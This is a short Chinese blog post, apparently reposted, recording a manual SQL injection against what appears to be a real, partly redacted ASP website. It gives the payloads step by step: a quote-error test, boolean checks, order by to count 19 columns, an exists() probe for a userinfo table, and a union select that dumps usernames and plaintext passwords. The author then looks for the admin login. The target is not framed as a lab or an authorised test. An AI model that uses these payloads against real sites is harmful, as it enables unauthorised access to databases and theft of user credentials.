码迷,mamicode.com
首页 > 其他好文 > 详细

手工注入

时间:2017-03-08 21:09:37      阅读:131      评论:0      收藏:0      [点我收藏+]

标签:空白   技术分享   image   md5   png   exists   rom   info   登录   

...gong.com/about.asp?dd=613‘ //出错

再来

...gong.com/about.asp?dd=613 and 1=1 //正常

...gong.com/about.asp?dd=613 and 1=2//出错

一个注入点

...gong.com/about.asp?dd=613 order by 1 //正常

...gong.com/about.asp?dd=613 order by 19 //正常

技术分享

...gong.com/about.asp?dd=613 order by 20 //出错

技术分享

来猜表名(遗憾的是没猜出来,用工具跑出来了)

...gong.com/about.asp?dd=613 and exists(select * from userinfo)//正常,说明存在这个表

技术分享

再来猜字段

..gong.com/about.asp?dd=613  union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from userinfo //页面出来两个数字 13和17

技术分享

再把13和17用猜的字段代替

..gong.com/about.asp?dd=613  union select 1,2,3,4,5,6,7,8,9,10,11,12,username,14,15,16,password,18,19 from userinfo

技术分享

用户名和密码爆出来了,密码7位,没有md5加密

找出后台登录就行

猜了几个后台地址都不对,拿工具跑吧

..gong.com/conn.asp    //200

打开一看页面空白,应该被人弄过了,这次无聊加以复习心态的一次手工注入就到这结束

 

手工注入

标签:空白   技术分享   image   md5   png   exists   rom   info   登录   

原文地址:http://www.cnblogs.com/RLflash/p/6522998.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!